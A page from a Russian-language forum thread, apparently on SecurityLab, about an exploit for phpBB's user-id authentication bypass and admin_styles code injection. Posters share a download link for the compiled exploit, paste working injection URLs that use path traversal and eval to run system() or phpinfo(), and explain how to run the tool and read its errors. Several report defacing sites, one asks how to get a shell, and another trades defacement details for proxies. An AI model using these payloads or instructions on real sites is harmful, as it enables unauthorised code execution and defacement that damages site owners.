Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 ... 4 5 6 7 8 След.
RSS
phpBB User id Auth. Bypass and "admin_styles" Code Inject...
 
дайте пожалуйста линк с бинарником
 
http://www.xfocus.net/tools/200503/phpbbexp.rar
 
Цитата
dark spyrit пишет:
 
Цитата
][лам пишет:
получал...
http://www.*.ru/phpBB2/admin/admin_styles.php?mode=addnew&in stall_to=../../../.
./../../../../../../../../../../../../../../../tmp&nigga=sys tem(fuck);&fuck=ls -la&sid=***
вот это пишет Parse error: parse error, unexpected T_STRING in /tmp/theme_info.cfg(8) : eval()d code on line 1
Ну это специально чтобы маленькие сопливые мальчики пораскинули мозгами, а не начитавшись чего-то там возомнили себя крутизной немерянной...
 
во Ламерье-то =) [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG]
 
(
VVOGU:
D:\Documents and Settings\*\??????? ????>phpbbexp.exe http://--.ru/FORUMS/ 193.125.6*.* 8888

I NOFIGA=((
 
да...... [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG]
 
Аможно самый глупый вопрос, где юзать эти сплоиты? как запускать?
 
народ дайте пару ссылок на бинарники, а то ниодна не работает
 
Чёрт, я так и не понял, что нужно писать после адреса форума - свой ай пи и порт, что ли?
 
Lamerz must die....get back from seculab noobs... [IMG]http://www.securitylab.ru/forum/smileys/smiley7.gif[/IMG]
 
Хм... Отличный эксплойт. Дефейс сайта удалось сделать на ура. Шелл я правда не выбил, т.к занний опыта пока ноль. Только вот один недостаток есть, почему-то эксплойт реагирует только на базу данных, где записи форума начинаются с префикса phpbb_ или что-то связанное с этим, то есть классическое...

Если кто не сильно гнущий пальцы, напишите на мыло, как шелл выбить, т.к моих мозгов не хватает.
Мыло: numenor@bk.ru
 
подскажите плиз что делать когда не находит "мускул"???
эт я не правильно юзаю или форум уже пропатчен??
 
Хм... Я тестил сплойт на своём серваке и вот к каким выводам пришел.

1. Если пишет ошибку _ recuperation du nom de la table sql ... cant find , то это значит, что форумные записи в базе данных имеют префикс отличный от стандартных поставок, т.е. отличается от phpbb_ или phpbb3_ . Лично я понял эту ошибку так.

2. Если вас обрадовали ошибкой типа: _ recuperation de lidentifiant de session a echouer , то огорчаться не стоит. Просто вы не правильно указали путь к форуму. Рассмотрим пример: вы ломаете форум, который находится на сайте www.yoursite.com в папке forum
Тогда в командной строке надо ввести следующее phpbbexp.exe www.yoursite.com/forum/ 1 1
Если не будет последней палки (/), то тогда вы получите ошибку _ recuperation de lidentifiant de session a echouer.

3. Получение админских прав делается с помощью ссылочки, которая появляется примерно в таком виде

D:\Dzo>exp http://www.yoursite.com/forum/ 1 1
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperщ ... 278209e59a499486df18e5499c84eb8b
http://www.yoursite.com/forum/?sid=278209e59a499486df18e5499 c84eb8b (Вставляете эту ссылку в браузер и вуа ля. Не забудьте кукисы почистить)
_ recuperation du nom de la table sql ... phpbb3 OK
_ Injection de la fake templates ...OK
_ Fichier crщe
_ Code executщ
http://www.yoursite.com/forum/admin/admin_styles.php?mode=ad dnew&install_to=../..
/../../../../../../../../../../../../../../../../../tmp&nigg a=phpinfo();&sid=278
209e59a499486df18e5499c84eb8b

4. Способы защиты найденные мной весьма примитивны =-). Либо обновить форум до новой версии либо изменить префикс перед записями в БД.

Вот пока вся информация, которой считаю нужным поделиться. Подробную информацию о том, как сделать дефейс обменя на 1-2 свежих рабочих прокси сервера, лучше , чтобы с территории РФ.

Если есть желание пообщаться на тему получения шелла с этого эксплойта, с радостью отвечу по ICQ: 759809
 
Хм... Вот блин, залогиниться забыл =-) Все выше написанное может быть обсуждено в личке =-) Удачи
 
Цитата
Гость пишет:
1. Если пишет ошибку _ recuperation du nom de la table sql ... cant find , то это значит, что форумные записи в базе данных имеют префикс отличный от стандартных поставок, т.е. отличается от phpbb_ или phpbb3_ . Лично я понял эту ошибку так.
как я понял траблу с тем что не находит мускул никак не обойти???  или все таки можно?
 
а можете дать ссылку на уже скомпиленный эксплоит?
 
Цитата
Happer пишет:
Цитата
Гость пишет:
1. Если пишет ошибку _ recuperation du nom de la table sql ... cant find , то это значит, что форумные записи в базе данных имеют префикс отличный от стандартных поставок, т.е. отличается от phpbb_ или phpbb3_ . Лично я понял эту ошибку так.
как я понял траблу с тем что не находит мускул никак не обойти???  или все таки можно?

Я тоже так понял. Хотя попробую еще раз покапаться в коде. Посмотрим...


Цитата
Гость пишет:
а можете дать ссылку на уже скомпиленный эксплоит?

Почитай предыдущие страницы, там была ссылка. Я забирал оттуда.
 
сплойт работает, дефэйс успешно сделан
 
<font size="3"><font color=RED>Не ну народ дайте пару не битых ссылок на эксплойты собранные. Без исходников.</font></font>
 
Цитата
help пишет:
<font size="3"><font color=RED>Не ну народ дайте пару не битых ссылок на эксплойты собранные. Без исходников.</font></font>
а это что?  http://www.xfocus.net/tools/200503/phpbbexp.rar

там скачивал успешно работает
Страницы: Пред. 1 ... 4 5 6 7 8 След.
Читают тему